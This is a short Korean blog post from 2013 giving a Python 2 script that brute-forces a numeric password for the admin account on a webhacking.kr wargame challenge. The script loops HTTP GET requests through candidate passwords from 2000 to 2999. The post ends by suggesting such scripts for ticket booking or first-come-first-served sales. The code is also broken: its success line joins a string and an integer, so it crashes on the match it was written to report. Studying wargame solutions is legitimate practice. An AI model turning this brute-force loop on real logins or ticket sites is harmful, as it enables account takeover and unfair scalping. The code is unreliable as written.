[Python] Http BruteForce 예제

프로그래밍

[Python] Http BruteForce 예제

dladbru 2013. 7. 31. 02:18

import httplib
import time

headers = {
    'Host':'webhacking.kr',
    'Cookie':'PHPSESSID=사용자 쿠키값; notice=yes'
    }

 
conn = httplib.HTTPConnection('webhacking.kr', 80)


for i in range(2000, 3000):
    conn.request('GET', '/challenge/web/web-04/index.php?cid=admin&cpw=%s'%i,'', headers)
    #request argv[2] == body OK?
    r = conn.getresponse()
    res=r.read()
 #   print res
 #   time.sleep(1)
    if(not res.find('Wrong')+1):
        print "Password is"+i

사람이 직접 접속해서 결과값을 확인해도되나, 인력의 소모가 많으니 위와같은 스크립트를 짜서 돌리면 결과를 쉽게확인할 수 있다.

이런 간단한 스크립트로 티켓의 예매나 선착순인 작업에 쓰일 수 있겠다.